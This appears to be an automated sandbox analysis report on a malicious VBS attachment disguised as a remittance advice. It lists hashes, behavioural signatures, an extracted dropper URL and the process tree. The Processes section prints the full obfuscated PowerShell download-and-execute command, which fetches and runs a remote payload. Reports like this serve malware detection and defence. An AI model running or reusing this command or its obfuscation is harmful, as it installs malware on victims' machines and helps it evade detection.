Analysis
-
max time kernel
8s -
max time network
46s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
23-07-2021 17:12
Static task
static1
Behavioral task
behavioral1
Sample
Remittance_Advice.vbs
Resource
win7v20210410
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Remittance_Advice.vbs
Resource
win10v20210410
windows10_x64
0 signatures
0 seconds
General
-
Target
Remittance_Advice.vbs
-
Size
875B
-
MD5
fc4a8faf57b167de212a02466d0f5435
-
SHA1
8b83c8dad3b1168c37729b8c6551e7ac4d0071af
-
SHA256
84199bedc07e09ccb967692a43de715611625dc247ceea48ea2f4a7109bc5287
-
SHA512
855874d54ef794939a9c2da096dda06168f34cdb17500d762a4bbdaeb0e5ad687da86791150b83381e3617ff5ff88fb124c7b2d76c5f120b997d91206b7d18f0
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://www.maan2u.com/a/ALL.txt
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 6 852 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 852 powershell.exe 852 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 852 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
WScript.exedescription pid process target process PID 1088 wrote to memory of 852 1088 WScript.exe powershell.exe PID 1088 wrote to memory of 852 1088 WScript.exe powershell.exe PID 1088 wrote to memory of 852 1088 WScript.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Remittance_Advice.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TRUMP ='https://www.maan2u.com/a/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/852-61-0x0000000000000000-mapping.dmp
-
memory/852-63-0x0000000002360000-0x0000000002361000-memory.dmpFilesize
4KB
-
memory/852-64-0x000000001ABF0000-0x000000001ABF1000-memory.dmpFilesize
4KB
-
memory/852-65-0x0000000002440000-0x0000000002441000-memory.dmpFilesize
4KB
-
memory/852-66-0x000000001AA80000-0x000000001AA82000-memory.dmpFilesize
8KB
-
memory/852-67-0x000000001AA84000-0x000000001AA86000-memory.dmpFilesize
8KB
-
memory/852-68-0x00000000023A0000-0x00000000023A1000-memory.dmpFilesize
4KB
-
memory/852-70-0x000000001C4E0000-0x000000001C4E1000-memory.dmpFilesize
4KB
-
memory/1088-60-0x000007FEFC181000-0x000007FEFC183000-memory.dmpFilesize
8KB